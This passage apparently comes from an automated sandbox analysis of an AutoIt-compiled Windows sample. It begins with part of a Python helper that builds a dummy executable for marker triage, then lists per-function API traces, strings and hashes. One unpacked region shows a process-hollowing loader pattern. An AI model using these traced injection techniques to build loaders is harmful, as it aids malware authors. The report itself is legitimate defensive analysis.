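    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    opt_size = 0xE0  # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    opt = b"\x0b\x01" + b"\0" * (opt_size - 2)  # magic 0x10B, rest zeroed
    raw_ptr, raw_size = 0x200, 0x200
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x200, 0x1000, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    hdr = (dos + b"PE\0\0" + coff + opt + section).ljust(raw_ptr, b"\0")
    image = hdr + b"\x90" * raw_size
    return image + AU3_PREFIX + AU3_MAGIC + b"<compiled script body>"


if __name__ == "__main__":
    for hit in triage(build_sample()):
        print(hit)
```

A marker hit in the overlay with the full prefix present is the strong signal; a bare "AU3!EA06" inside the image is usually just the stub's own comparison constant, which is exactly what the listing above is checking against.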

                                                            Control-flow Graph

                                                            • Control-flow graph (image not preserved): basic blocks 401100-401225 and 42afb4-42b06d; calls to 401250, 401000, 40e0c0, 40f190, 468b0e, 401a50, 4370f4, 45fd57; API nodes DefWindowProcW, KillTimer, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                            • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                            Control-flow Graph (function at 4115d7; executed/not-executed block graph not reproduced here)
                                                            APIs
                                                            • _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • std::exception::exception.LIBCMT ref: 00411626
                                                            • std::exception::exception.LIBCMT ref: 00411640
                                                            • __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                            • String ID: ,*H$4*H$@fI
                                                            • API String ID: 615853336-1459471987
                                                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                            Control-flow Graph (function at 2e72600, calling CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree; executed/not-executed block graph not reproduced here)
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02E726D1
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02E728F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction ID: 34426ec7de7eb01c5280c49183194482ee6c22c8e191b5c07d1d723f8d1ce6bd
                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction Fuzzy Hash: E9A1F674E40209EBEB14CFA4C994BEEBBB5FF48304F209559E601BB280D7759A81CF95

                                                            Control-flow Graph (function at 40e4c0, calling RegOpenKeyExW, RegQueryValueExW twice and RegCloseKey; executed/not-executed block graph not reproduced here)
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                            • API String ID: 1586453840-614718249
                                                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                            Control-flow Graph (single basic block 410570-4105f1, calling CreateWindowExW twice and ShowWindow twice; executed/not-executed block graph not reproduced here)
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

                                                            Control-flow Graph (function at 2e723b0, calling CreateFileW, VirtualAlloc, ReadFile and ExitProcess; executed/not-executed block graph not reproduced here)
                                                            APIs
                                                              • Part of subcall function 02E722A0: Sleep.KERNELBASE(000001F4), ref: 02E722B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02E724EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: NSPJRP4MPB2WDW78XIUGYC8NE
                                                            • API String ID: 2694422964-3204172417
                                                            • Opcode ID: f251835c78afbe6f5218fa34feab20dbbdf6e9e3ebed218ac8e54a33fcfb9715
                                                            • Instruction ID: 6539da7a0435549ea5adf09d6ab3dd669f8567f35c80638167eed91ef63eabf5
                                                            • Opcode Fuzzy Hash: f251835c78afbe6f5218fa34feab20dbbdf6e9e3ebed218ac8e54a33fcfb9715
                                                            • Instruction Fuzzy Hash: 7F519170D04288DBEF11D7B4C854BDEBBB5AF15304F049198E648BB2C1D7B91B49CBA6
                                                            APIs
                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcsncpy.LIBCMT ref: 00401C41
                                                            • _wcscpy.LIBCMT ref: 00401C5D
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                            • String ID: Line:
                                                            • API String ID: 1874344091-1585850449
                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Close$OpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 1607946009-824357125
                                                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                            APIs
                                                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                            • _wcsncpy.LIBCMT ref: 004102ED
                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                            • _wcsncpy.LIBCMT ref: 00410340
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                            • String ID:
                                                            • API String ID: 3170942423-0
                                                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02E71A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E71AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E71B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction ID: 96a8c51623e94293418e728b8c82a0a0059cb1336776a59fd6e0cf63e94e29b6
                                                            • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction Fuzzy Hash: 4F621B30A54258DBEB24CFA4C850BDEB372EF58704F1091A9D20DEB394E7759E81CB59
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: Error:
                                                            • API String ID: 4104443479-232661952
                                                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                            • String ID: X$pWH
                                                            • API String ID: 85490731-941433119
                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 00401B57
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                            • String ID: @EXITCODE
                                                            • API String ID: 2734553683-3436989551
                                                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                            • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1794320848-0
                                                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 2429186680-0
                                                            • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                            • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                            • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0043214B
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _malloc.LIBCMT ref: 0043215D
                                                            • _malloc.LIBCMT ref: 0043216F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _malloc$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 680241177-0
                                                            • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                            • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                            APIs
                                                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                            • _free.LIBCMT ref: 004295A0
